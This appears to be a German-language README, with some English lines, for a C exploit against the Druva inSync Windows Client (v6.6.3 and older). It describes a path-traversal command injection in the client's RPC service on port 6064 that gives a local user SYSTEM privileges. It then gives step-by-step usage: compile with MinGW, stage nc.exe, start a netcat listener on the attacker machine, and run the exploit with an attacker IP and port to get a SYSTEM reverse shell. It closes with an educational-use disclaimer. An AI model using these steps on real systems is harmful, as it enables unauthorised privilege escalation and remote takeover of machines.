
Lokale Privilegieneskalation für Druva
Ein C-basierter Exploit für den Druva inSync Windows Client (v6.6.3 und älter). Die Anwendung stellt einen RPC-Dienst auf Port 6064 bereit, der anfällig für Befehlsinjektion mittels Pfad-Traversal ist. Dadurch kann ein lokaler Benutzer beliebige Befehle als NT AUTHORITY\SYSTEM ausführen.
Verwenden Sie gcc (MinGW), um den Quellcode zu kompilieren:
gcc exploit.c -o exploit.exe -lws2_32
Platzieren Sie eine Kopie von nc.exe in einem Verzeichnis, auf das das SYSTEM-Konto zugreifen kann (z. B. C:\Windows\Tasks).
Starten Sie einen Listener auf Ihrer Angreifer-Maschine:
nc -lvnp 4444
Run the exploit on the target Windows machine:
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe
Dieses Tool dient ausschließlich Bildungszwecken. Die unbefugte Nutzung auf Systemen, für die Sie keine Testberechtigung haben, ist illegal.